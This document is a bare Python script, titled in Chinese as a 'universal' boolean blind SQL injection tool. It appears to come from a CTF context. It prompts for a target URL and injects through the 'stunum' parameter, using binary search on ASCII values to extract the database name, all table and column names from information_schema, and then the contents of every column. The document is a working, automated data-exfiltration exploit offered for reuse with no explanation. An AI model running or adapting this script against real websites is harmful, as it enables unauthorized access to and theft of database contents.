布尔盲注万能脚本

import time
import requests
import re
Success_message = "Hi"
def cont(text):
    obj=re.compile(r'<h2 class="mb">(?P<xiao>.*?)</h2>',re.S)
    res = obj.finditer(text)
    for i in res:
        c=(i.group("xiao"))
    return c
 
def database_name():
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name
 
 
def table_name():
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)
 
 
def column_name(tab_name):
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)
 
 
def get_data(tab_name, col_name):
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in cont(res.text):
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print(("%s表的%s字段数据: " + data) % (tab_name, col_name))
 
 
if __name__ == '__main__':
    url = input("请输入url：")
    database_name()
    table_name()